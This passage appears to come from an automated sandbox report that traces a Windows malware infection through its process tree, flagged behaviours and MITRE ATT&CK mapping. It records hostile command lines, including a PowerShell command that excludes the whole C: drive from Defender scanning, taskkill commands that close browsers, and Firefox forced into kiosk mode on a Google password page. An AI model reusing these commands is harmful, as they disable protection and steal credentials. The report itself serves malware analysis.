                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  PID: 4500

          C:\Users\Admin\AppData\Local\Temp\10369640101\u75a1_003.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\10369640101\u75a1_003.exe"
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: MapViewOfSection
            - Suspicious use of WriteProcessMemory
            PID: 1776

            C:\Windows\SYSTEM32\cmd.exe
              Command line: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
              - Suspicious use of WriteProcessMemory
              PID: 1884

              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Command line: powershell.exe Add-MpPreference -ExclusionPath 'C:'
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                PID: 4880

            C:\Windows\system32\svchost.exe
              Command line: "C:\Windows\system32\svchost.exe"
              - Downloads MZ/PE file
              - Adds Run key to start application
              PID: 4884

              C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                Command line: "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                - Executes dropped EXE
                PID: 3888

              C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                Command line: "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                - Deletes itself
                - Executes dropped EXE
                PID: 948

          C:\Users\Admin\AppData\Local\Temp\10369650101\ae9ccc196b.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\10369650101\ae9ccc196b.exe"
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - Suspicious use of WriteProcessMemory
            PID: 5556

            C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
              PID: 5784

          C:\Users\Admin\AppData\Local\Temp\10369670101\ce59d98f05.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\10369670101\ce59d98f05.exe"
            - Identifies VirtualBox via ACPI registry values (likely anti-VM)
            - Checks BIOS information in registry
            - Executes dropped EXE
            - Identifies Wine through registry keys
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - System Location Discovery: System Language Discovery
            PID: 7612

          C:\Users\Admin\AppData\Local\Temp\10369680101\5796d75ec2.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\10369680101\5796d75ec2.exe"
            - Identifies VirtualBox via ACPI registry values (likely anti-VM)
            - Checks BIOS information in registry
            - Executes dropped EXE
            - Identifies Wine through registry keys
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - System Location Discovery: System Language Discovery
            PID: 9808

          C:\Users\Admin\AppData\Local\Temp\10369690101\751a73f7f3.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\10369690101\751a73f7f3.exe"
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            - Suspicious use of FindShellTrayWindow
            - Suspicious use of SendNotifyMessage
            PID: 12088

            C:\Windows\SysWOW64\taskkill.exe
              Command line: taskkill /F /IM firefox.exe /T
              - System Location Discovery: System Language Discovery
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
              PID: 4128

            C:\Windows\SysWOW64\taskkill.exe
              Command line: taskkill /F /IM chrome.exe /T
              - System Location Discovery: System Language Discovery
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
              PID: 12552

            C:\Windows\SysWOW64\taskkill.exe
              Command line: taskkill /F /IM msedge.exe /T
              - System Location Discovery: System Language Discovery
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
              PID: 228

            C:\Windows\SysWOW64\taskkill.exe
              Command line: taskkill /F /IM opera.exe /T
              - System Location Discovery: System Language Discovery
              - Kills process with taskkill
              - Suspicious use of AdjustPrivilegeToken
              PID: 7692

            C:\Windows\SysWOW64\taskkill.exe
              Command line: taskkill /F /IM brave.exe /T
              - Kills process with taskkill
              PID: 4924

            C:\Program Files\Mozilla Firefox\firefox.exe
              Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
              PID: 9464

              C:\Program Files\Mozilla Firefox\firefox.exe
                Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                PID: 9404

                C:\Program Files\Mozilla Firefox\firefox.exe
                  Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2000 -prefsLen 27099 -prefMapHandle 2004 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {01b2fb25-772c-4797-a3fc-95b85b37976a} -parentPid 9404 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9404" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                  PID: 8460

                C:\Program Files\Mozilla Firefox\firefox.exe
                  Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {25af4e45-98ff-4400-8770-9c32af50c007} -parentPid 9404 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9404" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                  PID: 2132

                C:\Program Files\Mozilla Firefox\firefox.exe
                  Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3848 -prefsLen 25213 -prefMapHandle 3852 -prefMapSize 270279 -jsInitHandle 3856 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3864 -initialChannelId {28117bea-570c-494e-b695-744e18678681} -parentPid 9404 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9404" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                  PID: 7832

                C:\Program Files\Mozilla Firefox\firefox.exe
                  Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4020 -prefsLen 27325 -prefMapHandle 4024 -prefMapSize 270279 -ipcHandle 4100 -initialChannelId {7de9eeec-db3b-42b5-a11e-00e89159ef41} -parentPid 9404 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9404" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                  PID: 7772

                C:\Program Files\Mozilla Firefox\firefox.exe
                  Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4324 -prefsLen 34824 -prefMapHandle 4328 -prefMapSize 270279 -jsInitHandle 4332 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4340 -initialChannelId {87f64fa3-958f-4bec-aea4-47cba5cf028f} -parentPid 9404 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9404" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                  PID: 7180

                C:\Program Files\Mozilla Firefox\firefox.exe
                  Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4852 -prefsLen 34905 -prefMapHandle 4856 -prefMapSize 270279 -ipcHandle 4016 -initialChannelId {914816c7-c381-4628-a1d8-980c3cd74a8a} -parentPid 9404 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9404" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                  PID: 9700

                C:\Program Files\Mozilla Firefox\firefox.exe
                  Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3304 -prefsLen 32845 -prefMapHandle 5096 -prefMapSize 270279 -jsInitHandle 5124 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5132 -initialChannelId {30dae4b6-d4ee-422c-aed0-d590e079759a} -parentPid 9404 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9404" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                  PID: 10316

                C:\Program Files\Mozilla Firefox\firefox.exe
                  Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5380 -prefsLen 32845 -prefMapHandle 5384 -prefMapSize 270279 -jsInitHandle 5388 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4848 -initialChannelId {097ac4ac-7d2c-4e85-9b1a-bd3b99286e31} -parentPid 9404 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9404" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                  PID: 10400

                C:\Program Files\Mozilla Firefox\firefox.exe
                  Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5572 -prefsLen 32845 -prefMapHandle 5576 -prefMapSize 270279 -jsInitHandle 5580 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5588 -initialChannelId {355cb1df-ce99-4de1-ae3d-099232aa7a7e} -parentPid 9404 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9404" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                  PID: 10404

          C:\Users\Admin\AppData\Local\Temp\10369700101\2c08ea48de.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\10369700101\2c08ea48de.exe"
            PID: 9040

          C:\Users\Admin\AppData\Local\Temp\10369710101\60ab896418.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\10369710101\60ab896418.exe"
            PID: 2852

            C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\10369710101\60ab896418.exe"
              PID: 7080

          C:\Users\Admin\AppData\Local\Temp\10369720101\40608a0434.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\10369720101\40608a0434.exe"
            PID: 6928

            C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\10369720101\40608a0434.exe"
              PID: 11144

C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
  PID: 3640

C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
  PID: 624

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID: 2556
Repeated top-level launches of the dropped 8fe1ZIHI3C10.exe. Every pair below is a parent
  C:\Windows\system32\cmd.exe  (Command line: C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe)
spawning the child
  C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe  (Command line: C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe)
Behaviours flagged on the child are abbreviated as:
  A = Executes dropped EXE
  B = Adds Run key to start application
  C = System Location Discovery: System Language Discovery
  D = Suspicious behavior: EnumeratesProcesses
  E = Suspicious use of AdjustPrivilegeToken

cmd.exe PID | 8fe1ZIHI3C10.exe PID | child behaviours
12852 | 12912 | A B C D E
12988 | 13032 | A B C D E
13072 | 13116 | A B C E
13196 | 13240 | A B C E
13292 | 6208 | A B C E
6264 | 6340 | A B C E
6472 | 6524 | A B C E
6584 | 6628 | A B C E
6672 | 6760 | A B C E
6864 | 7040 | A B C E
4740 | 3372 | A B C E
7176 | 7268 | A B C E
7392 | 7628 | A B C E
8064 | 6104 | A B C E
1336 | 8204 | A B C E
8320 | 8484 | A B C E
8672 | 8860 | A B C E
8976 | 9072 | A B C E
9156 | 9228 | A B C E
9324 | 9428 | A B C E
9504 | 9608 | A B C E
9896 | 10220 | A B C E
10340 | 10444 | A B C E
10532 | 10620 | A B C E
10712 | 10792 | A B C E
3548 | 10988 | A B E
11072 | 11164 | A B C E
11248 | 11284 | A B C E
11364 | 11488 | A B C E
11588 | 11704 | A B C E
11792 | 11896 | A B C E
12176 | 12276 | A B C E
2252 | 4916 | A B C E
12304 | 12396 | A B C E
12484 | 6236 | A B C E
5680 | 5784 | A C
9516 | 9364 | (none)
9104 | 8888 | (none)
8376 | 8256 | (none)
4556 | 8060 | (none)
7704 | 7348 | (none)
4432 | 1548 | (none)
12548 | 2204 | (none)
12752 | 13208 | (none)
12828 | 3732 | (none)
856 | 7464 | (none)

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  PID: 7876

cmd.exe PID | 8fe1ZIHI3C10.exe PID | child behaviours
7960 | 10176 | (none)
4108 | 12204 | (none)
2904 | (no child recorded) | 
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵PID:6824
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:9968
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵PID:10588
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:11404
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵PID:6996
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:13096
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵PID:7104
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\4dlzDAIffoKl.exe1⤵PID:6832
-
C:\Users\Admin\AppData\Local\Temp\4dlzDAIffoKl.exeC:\Users\Admin\AppData\Local\Temp\4dlzDAIffoKl.exe2⤵PID:8692
-
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Downloads